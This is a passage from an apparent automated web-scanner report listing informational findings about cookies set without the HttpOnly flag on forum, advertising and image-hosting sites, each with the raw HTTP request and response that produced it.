X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:02:01 GMT


18.283. http://forums.silverlight.net/members/easterr0xes.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/easterr0xes.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/easterr0xes.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:24 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 239
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2feasterr0xes.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:27 GMT; expires=Mon, 23-Apr-2012 16:01:27 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:27 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2feasterr0xes
...[SNIP]...

18.284. http://forums.silverlight.net/user/profile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /user/profile.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/profile.aspx?UserID=60099 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:28 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 249
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3fUserID%3d60099
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:33 GMT; expires=Mon, 23-Apr-2012 16:01:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:33 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fuser%2fprofile.aspx%3
...[SNIP]...

18.285. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1027338450/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1027338450/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1027338450/?random=1303691757847&cv=6&fst=1303691757847&num=1&fmt=3&value=0&label=2I9kCNjXnwEQ0uHv6QM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 00:35:47 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 25-Apr-2011 00:50:47 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

18.286. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1040833525/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1040833525/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1040833525/?random=1303693568529&cv=6&fst=1303693568529&num=1&fmt=3&value=0&label=Mdc0CIOO1wEQ9ben8AM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 01:36:45 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 25-Apr-2011 01:51:45 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

18.287. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072108379/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1072108379/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1072108379/?random=1303692848426&cv=6&fst=1303692848426&num=1&fmt=3&value=0&label=J2jSCPzy3gEQ26ac_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 00:53:58 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 25-Apr-2011 01:08:58 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

18.288. http://hellometro.us.intellitxt.com/intellitxt/front.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hellometro.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=27851 HTTP/1.1
Host: hellometro.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviRlXVgA-; Domain=.intellitxt.com; Expires=Thu, 23-Jun-2011 20:00:30 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviRlXVgA-; Domain=.intellitxt.com; Expires=Thu, 23-Jun-2011 20:00:30 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 20:00:30 GMT
Age: 0
Connection: keep-alive
Content-Length: 11704

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

18.289. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4318baf9-76a8-4375-a570-ccc64464b1df HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250; domain=.interclick.com; expires=Sun, 25-Apr-2021 00:52:54 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 00:52:54 GMT

GIF89a.............!.......,...........D..;

18.290. http://image.providesupport.com/js/spiffyman/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/spiffyman/safe-standard.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/spiffyman/safe-standard.js?ps_h=EPGr&ps_t=1303674267005 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=L26F36YDGtP8;Path=/;Domain=.providesupport.com
Content-Length: 5028
Date: Sun, 24 Apr 2011 19:46:50 GMT
Connection: close

var psEPGrsid = "L26F36YDGtP8";
// safe-standard@gecko.js

var psEPGriso;
try {
   psEPGriso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psEPGrwid != null);
} catch(e) {
   psEPGr
...[SNIP]...

18.291. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTEwMzkmdGw9NDMyMDA=&piggybackCookie=xrd52zkwjuxh HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:12 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_133=1873-xrd52zkwjuxh; domain=pubmatic.com; expires=Tue, 24-May-2011 16:35:12 GMT; path=/
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254912; domain=pubmatic.com; expires=Sun, 20-Apr-2014 05:03:13 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

18.292. http://img167.imageshack.us/img167/6361/06ls4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img167.imageshack.us
Path:   /img167/6361/06ls4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img167/6361/06ls4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img167.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 924976
Last-Modified: Wed, 23 Aug 2006 09:56:56 GMT
X-Server-Name-And-Port: img211.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=bea29fd082ba49ca9dbf1c65e168a013; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.....v.v.......4......................................................................................................    .......................................................................
...[SNIP]...

18.293. http://img262.imageshack.us/img262/3146/17ls3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img262.imageshack.us
Path:   /img262/3146/17ls3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img262/3146/17ls3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img262.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 67776
Last-Modified: Sun, 06 Apr 2008 21:39:23 GMT
X-Server-Name-And-Port: img262.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=9c5e791d8287483a99eb3be054c25116; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......H.X.."..............................
...[SNIP]...

18.294. http://imp.constantcontact.com/imp/cmp.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.constantcontact.com
Path:   /imp/cmp.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/cmp.jsp?impcc=IMP_14302119028291151&o=http://img.constantcontact.com/lp/images/standard/spacer.gif HTTP/1.1
Host: imp.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=&placementid=14302119028291151&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 07 Sep 2007 15:01:23 GMT
ETag: "b95c5-2b-4398ce98736c0"
Accept-Ranges: bytes
Content-Length: 43
X-Powered-By:
Content-Type: image/gif
Cookie: "IMP_1430293015671252=21400210|IMP_14302119028250221=21609811|IMP_14302119028250220=21609730|IMP_14302119028250222=21609705|IMP_14302119028250221=21607469|"
IMPCC_COOKIE_NEW: IMP_14302119028250220=21609730|IMP_14302119028250222=21609705|IMP_14302119028250221=21607469|
IMPCC_COOKIE: IMP_14302119028250220=21609730|IMP_14302119028250222=21609705|IMP_14302119028250221=21607469|
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028250221
Cookie: "IMP_14302119028289011=21610280|"
IMPCC_COOKIE_NEW:
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028289011
Expires: Sun, 24 Apr 2011 15:30:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 15:30:20 GMT
Connection: close
Set-Cookie: impcc="IMP_14302119028291151=21727650|"; expires=Sat, 23-Jul-2011 15:30:20 GMT; path=/; domain=.constantcontact.com
Cookie: "IMP_14302119028291151=21727650|"
IMPCC_COOKIE_NEW:
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028291151

GIF89a.............!.......,...........D..;

18.295. http://insight.adsrvr.org/track/conv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insight.adsrvr.org
Path:   /track/conv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl HTTP/1.1
Host: insight.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:32:52 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 25-Apr-2012 00:32:52 GMT; path=/
X-AspNet-Version: 4.0.30319
Connection: keep-alive
Content-Length: 75

<img src="//cm.g.doubleclick.net/pixel?nid=TheTradeDesk" height=1 width=1/>

18.296. http://inter.viewcentral.com/events/cust/search_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://inter.viewcentral.com
Path:   /events/cust/search_results.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1 HTTP/1.1
Host: inter.viewcentral.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VCInter=2399469578.20480.0000; ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx

Response

HTTP/1.1 302 Found
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Date: Sun, 24 Apr 2011 20:28:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 1.1.4322
Location: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 242

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&amp;cat3_id=16&amp;pid=1&amp;event_id=20&a
...[SNIP]...

18.297. https://inter.viewcentral.com/events/cust/search_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/cust/search_results.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1 HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Date: Sun, 24 Apr 2011 20:28:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="javascript">


function getCookieVal (offset) {
var
...[SNIP]...

18.298. https://inter.viewcentral.com/events/images/border/trans_spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/border/trans_spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/border/trans_spacer.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 855
Content-Type: image/gif
